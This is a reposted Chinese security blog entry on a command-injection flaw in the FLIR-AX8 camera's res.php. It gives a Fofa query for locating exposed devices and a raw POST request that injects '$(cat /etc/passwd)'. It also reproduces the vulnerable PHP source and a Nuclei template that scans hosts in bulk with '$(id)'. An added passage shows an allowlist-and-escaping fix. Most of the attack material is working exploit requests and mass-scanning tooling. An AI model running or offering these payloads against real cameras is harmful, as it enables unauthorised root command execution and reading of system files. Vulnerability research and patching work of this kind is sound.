FLIR-AX8 RCE Vulnerability

admin, 2 December 2023, 03:00:30

#Vulnerability Description#

The res.php file on the FLIR-AX8 has a command execution vulnerability; an attacker can use it to obtain server privileges.


#Vulnerability Reproduction#

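Step 1: Use the following query to search for assets and identify the attack target...

# Fofa search
app="FLIR-FLIR-AX8"

Step 2: Start Burp Suite (BP) and capture the home page request, then modify the request as follows to trigger command execution...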

POST /res.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

action=node&resource=$(cat /etc/passwd)


Step 3: Since most devices sit on internal networks and there are few exposed assets, no deeper vulnerability testing was done... Over!

<?php
if (isset($_POST["action"])) {
    switch ($_POST["action"]) {
        case "get":
            if (isset($_POST["resource"])) {
                switch ($_POST["resource"]) {
                    case ".rtp.hflip":
                        if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
                            $result = "false";
                            break;
                        }
                        $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
                        break;
                    case ".rtp.vflip":
                        if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
                            $result = "false";
                            break;
                        }
                        $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
                        break;
                    default:
                        // User input is concatenated into the shell command unescaped.
                        $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
                }
            }
            break;
        case "set":
            if (isset($_POST["resource"]) and isset($_POST["value"])) {
                switch ($_POST["resource"]) {
                    case "rtp.hflip":
                        file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
                        break;
                    case "rtp.vflip":
                        file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
                        break;
                    default:
                        // Both resource and value reach the shell unescaped.
                        $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;
                }
            }
            break;
        case "measurement":
            if (isset($_POST["type"]) && isset($_POST["id"])) {
                // type and id reach the shell unescaped.
                $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"]));
                $lines = explode("\n", $nodeData);
                foreach ($lines as $line) {
                    $resource = preg_split('/\s+/', $line);
                    $value = trim($resource[1], "\"");
                    $result[$resource[0]] = $value;
                }
            }
            break;
        case "global-parameters":
            $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));
            $lines = explode("\n", $nodeData);
            foreach ($lines as $line) {
                $resource = preg_split('/\s+/', $line);
                $result[$resource[0]] = $resource[1];
            }
            // No break here in the source as shown: execution falls through to "alarm".
        case "alarm":
            if (isset($_POST["id"])) {
                // id reaches the shell unescaped.
                $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"]));
                $lines = explode("\n", $nodeData);
                foreach ($lines as $line) {
                    $resource = preg_split('/\s+/', $line);
                    $value = trim($resource[1], "\"");
                    $result[$resource[0]] = $value;
                }
            }
            break;
        case "calibrate":
            $result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");
            break;
        case "node":
            // The branch used in the request above: resource goes straight into shell_exec().
            $nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"]));
            $result = preg_split("/\s+\n/", $nodes);
            break;
    }
    echo json_encode($result);
}
?>
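
One way to close the injection in the "node" branch of the res.php source above, as an added example that is not FLIR's code or the original author's: check `resource` against an allowlist pattern before it reaches the shell, then quote it with `escapeshellarg()`. The helper names `valid_resource` and `build_node_command` are hypothetical, and the dot-separated alphanumeric path grammar is an assumption drawn from the paths hard-coded in res.php.

```php
<?php
// Added example, not FLIR's code. Assumption: resource paths are dot-separated
// alphanumeric names, like the paths hard-coded in res.php.
const RLS = "LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls";

// Hypothetical helper: return the path if it matches the allowlist, else null.
function valid_resource($value): ?string
{
    // resource[]=x arrives as an array; reject anything that is not a short string.
    if (!is_string($value) || strlen($value) > 128) {
        return null;
    }
    // \A and \z anchor the whole string; "$" would accept a trailing newline.
    // No space, "$", "(", ";" or leading "-" can pass, so neither shell
    // metacharacters nor extra rls options reach the command line.
    $ok = preg_match('/\A\.?[A-Za-z0-9_]+(\.[A-Za-z0-9_]+)*\z/', $value) === 1;
    return $ok ? $value : null;
}

// Hypothetical helper: command line for the "node" action, or null to reject.
function build_node_command($resource): ?string
{
    $path = valid_resource($resource);
    if ($path === null) {
        return null;
    }
    // Quoting is defence in depth in case the pattern is ever loosened.
    return RLS . " " . escapeshellarg($path);
}

// Constructed inputs: a path taken from res.php, the two request bodies shown
// on this page, a value with a trailing newline, and an array-typed parameter.
$samples = [
    ".image.sysimg.basicImgData.objectParams",
    '$(cat /etc/passwd)',
    '$(id)',
    ".rtp.hflip\n",
    ["x"],
];
foreach ($samples as $sample) {
    $cmd = build_node_command($sample);
    $shown = json_encode($sample, JSON_UNESCAPED_SLASHES);
    echo $shown, " => ", $cmd ?? "rejected", "\n";
}
```

Only the first sample yields a command line; in the handler a null result should end the request with an error instead of calling `shell_exec()`. The same check applies to the "get", "set", "measurement" and "alarm" branches, which concatenate `resource`, `value`, `type` and `id` into `shell_exec()` in the same way.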


#Batch Script#


id: flir-ax8rce

info:
  name: flir-ax8rce
  author: Ph9ar
  severity: high
  description: flir-ax8rce
  reference:
    - https://4pts.online
  tags: rce

requests:
  - raw:
      - |-
        POST /res.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 26

        action=node&resource=$(id)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - root
      - type: status
        status:
          - 200


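The techniques, ideas and tools covered in articles published or reposted by 揽月安全团队 are for security-oriented study and exchange only. No one may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!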

Originally published on the WeChat official account 揽月安全团队: FLIR-AX8 RCE Vulnerability

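  • Published on 2 December 2023, 03:00:30
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   FLIR-AX8 RCE Vulnerability http://cn-sec.com/archives/2258689.html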
